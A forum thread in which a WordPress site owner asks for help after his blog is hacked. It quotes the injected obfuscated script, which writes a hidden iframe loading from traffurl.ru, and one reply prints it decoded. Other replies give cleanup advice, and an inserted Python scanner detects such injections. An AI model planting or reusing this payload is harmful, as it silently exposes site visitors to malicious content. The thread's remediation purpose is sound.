Some idiot keeps hacking my websites; up until now they have just been showcase sites for my WordPress themes, so I could uninstall WordPress and reinstall it without too much hassle. But now someone has hacked one of my major sites and I need help. When you go to the blog you get this in the source:

<!-- ~ --><script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%66%66%34%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%74%72%61%66%66%75%72%6c%2e%72%75%2f%73%6c%69%76%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%33%36%31%31%35%29%2b%27%39%5c%27%20%77%69%64%74%68%3d%37%39%35%20%68%65%69%67%68%74%3d%32%39%37%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script><!-- ~ -->

and it is downloading something from traffurl.ru. How do I get rid of it without having to lose all of my content, and how do I prevent this from happening again? Oh, and why do idiots do this, twats.

Any help will be much appreciated, thanks
Simon North
OK, I've managed to sort it out on the WordPress sites: just open index.php and delete the top line. How did they get that line of code on in the first place? Do they know my passwords, or is it some SQL hack or summat? Thanks
Are you using a free template (skin)? If not, be sure to change both your cPanel and WP passwords. Also check your local computer for spyware or key loggers.
And try running the latest WordPress with the latest versions of plugins, as there might be a vulnerability in there somewhere.
Hi, I would suggest you check your FTP access logs. If you don't have any, I would suggest changing your FTP password in particular and seeing if the issue stops.
All of the above, plus: change the password for the WordPress admin panel. They can edit files from there too. Check if your host is configured correctly and all security measures have been taken.
Looks like an XSS attack:

("window.status='Done';document.write('<iframe name=ff4 src=\'http://traffurl.ru/sliv?'+Math.round(Math.random()*236115)+'9\' width=795 height=297 style=\'display: none\'></iframe>')"));

You have a form field on your site that is allowing this person to inject code into your blog. It looks like anyone that visits your site will also be infected. Either your WP has a security hole, or one of the plugins that has some form field has a problem. Anyone who visits your site will have their browser abused. You can see from the iframe code how info is being accessed from the .ru domain. So more than likely you were made part of a botnet. Uninstalling and re-installing is not going to fix your problem. If your other sites have the same setup, they are vulnerable too.

phplife
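Added example, not part of any post in this thread: a Python scan of a site directory for the `eval(unescape("%..."))` injection shown in the first post, decoding each hit and listing the host its hidden iframe loads from. The function names are illustrative, and the sample line and `example.invalid` host are constructed for the example.

```python
import re
import sys
from pathlib import Path
from urllib.parse import unquote, urlparse

# eval(unescape("%xx%xx...")) whose argument is nothing but percent-encoded bytes.
INJECT_RE = re.compile(r'eval\(\s*unescape\(\s*["\']((?:%[0-9a-fA-F]{2})+)["\']\s*\)\s*\)')
# src URL of an iframe in the decoded script (its quotes may be backslash-escaped).
IFRAME_SRC_RE = re.compile(r'<iframe[^>]*?\bsrc=\\?["\']?(https?://[^\s"\'\\>]+)', re.I)

def decode_injections(text):
    """Return the decoded JavaScript of every eval(unescape("%..")) call in text."""
    return [unquote(m.group(1), encoding="latin-1") for m in INJECT_RE.finditer(text)]

def iframe_hosts(decoded_js):
    """Return the hostnames that iframes written by the decoded script load from."""
    return sorted({urlparse(u).hostname for u in IFRAME_SRC_RE.findall(decoded_js)})

def scan_tree(root, suffixes=(".php", ".html", ".htm", ".js")):
    """Map each file under root that holds an injection to [(line number, hosts)]."""
    findings = {}
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in suffixes:
            continue
        lines = path.read_text(encoding="latin-1").splitlines()
        hits = [(n, iframe_hosts(js)) for n, line in enumerate(lines, 1)
                for js in decode_injections(line)]
        if hits:
            findings[str(path)] = hits
    return findings

def make_sample():
    """Constructed sample with the same shape as the injected line (not the real payload)."""
    js = ("document.write('<iframe name=x src=\\'http://example.invalid/p?'"
          "+Math.round(Math.random()*10)+'9\\' style=\\'display: none\\'></iframe>')")
    encoded = "".join("%%%02x" % ord(c) for c in js)
    return ('<!-- ~ --><script>eval(unescape("%s")); </script><!-- ~ -->\n'
            '<?php // rest of index.php' % encoded)

if __name__ == "__main__":
    # Usage: python scan.py /path/to/site  (defaults to the current directory)
    for path, hits in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        for lineno, hosts in hits:
            print(f"{path}:{lineno}: injected script, iframe hosts: {hosts}")
```

Running it over every site on the account shows which files were modified, which is a quicker check than opening each index.php by hand.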
- upgrade WordPress to latest stable version
- check if all your plugins and widgets are updated.
- check on Google if anyone has had issues with your theme
- check on server file permissions

Hope this may help you out.